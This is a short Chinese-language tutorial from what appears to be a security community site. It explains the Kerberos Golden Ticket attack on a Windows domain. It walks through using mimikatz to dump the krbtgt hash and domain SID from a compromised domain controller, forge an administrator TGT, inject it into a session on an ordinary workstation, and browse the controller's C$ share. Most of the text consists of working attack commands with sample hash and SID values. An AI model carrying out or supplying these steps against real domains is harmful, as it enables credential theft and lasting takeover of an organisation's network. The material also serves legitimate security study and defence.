sechub官方2026-03-23文章来源:SecHub网络安全社区
TGT是由 KBRTGT HASH 加密的 sesionkey-as 和 Timestamp加密的,所以伪造黄金票据就是对TGT进行伪造,而前提就是要拿到KBRTGT HASH才可以伪造。
条件:
获得域控控制权
1.首先,我们登上域控,上传mimikatz,然后执行如下命令抓取krbtgt用户的Hash值并获取域sid:
privilege::debug
lsadump::lsa /patch // 专用于在域控制器上导出用户密码或hash
得到krbtgt用户的Hash为:7c4ed692473d4b4344c3ba01c5e6cb63,域sid为S-1-5-21-979886063-1111900045-1414766810
然后,我们切换到普通域用户的机器Windows 7,用mimikatz生成名为ticket.kirbi的TGT凭证,用户名为administrator:
kerberos::golden /user:administrator /domain:DEMO.com /sid:S-1-5-21-979886063-1111900045-1414766810 /krbtgt:7c4ed692473d4b4344c3ba01c5e6cb63 /ticket:ticket.kirbi
kerberos::golden /user:需要伪造的域管理员用户名 /domain:demo.com /sid:域sid /krbtgt: krbtgt用户的Hash /ticket:ticket.kirbi
生成TGT凭证ticket.kirbi成功,名为ticket.kirbi,然后使用mimikatz将凭证ticket.kirbi注入进去:
kerberos::ptt ticket.kirbi
kerberos::ptt <票据文件>
此时查看当前会话中的票据,就可以发现刚刚注入的票据在里面了:
kerberos::tgt
到此,注入成功。输入“exit”退出mimikatz,此时,攻击者就可以利用Windows 7可任意访问域控,可以使用net use进行登录
dir \\WIN-ENS2VR5TR3N\c$
